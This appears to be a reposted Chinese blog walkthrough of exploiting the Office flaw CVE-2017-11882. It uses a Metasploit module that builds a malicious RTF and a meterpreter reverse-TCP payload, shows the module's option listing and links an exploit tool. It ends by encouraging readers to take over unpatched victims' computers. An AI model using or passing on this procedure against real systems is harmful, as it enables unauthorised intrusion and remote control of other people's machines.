CVE-2017-11882 利用

版权声明:本文为Dark Pigeon原创文章,未经博主允许不得转载。 https://blog.csdn.net/m0_37217636/article/details/78945681

这个漏洞出来很久了,据说通杀以下版本的Office:

MicrosoftOffice 2000

MicrosoftOffice 2003

MicrosoftOffice 2007 Service Pack 3

MicrosoftOffice 2010 Service Pack 2

MicrosoftOffice 2013 Service Pack 1

MicrosoftOffice 2016

MicrosoftOffice 365

注意是没有更新过的Office。

屁话不多说了。因为我比较喜欢使用Metasploit框架,大家不喜欢的话可以到这个地址:https://github.com/Ridter/CVE-2017-11882.git下载工具。

首先,启动Metasploit并连接数据库(没有自动连接的请手动操作)。

然后加载这个模块,如图:

使用show options看看有什么要设置的。

msf exploit(windows/fileformat/office_ms17_11882) > show options 

Module options (exploit/windows/fileformat/office_ms17_11882):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILENAME     msf.rtf          yes       Filename to save as, or inject
   FOLDER_PATH                   no        Path to file to inject
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080             yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office


msf exploit(windows/fileformat/office_ms17_11882) > 
其中,Required选项为Yes的必须要填。有一些设置是默认的。

然后开始设置,并启动服务。


接着,我们在物理机上访问一下这个地址。

注意,我们启用了SSL,因此Chrome会弹出不安全提示。


只需要点高级,继续访问即可。


如图,就会下载这个文件。

如果Office没有打补丁,你就会发现返回了一个meterpreter回话,但是不幸的是,Win10给我自动更新装上了这个补丁,于是我看到的是这样的。


这也就意味着渗透失败了。但是如果对方是一个将Windows自动更新关闭且没有在安全软件的监护下安装漏洞补丁的人,你就可以使用meterpreter愉快的在他的电脑里玩耍了。

猜你喜欢

转载自blog.csdn.net/m0_37217636/article/details/78945681
今日推荐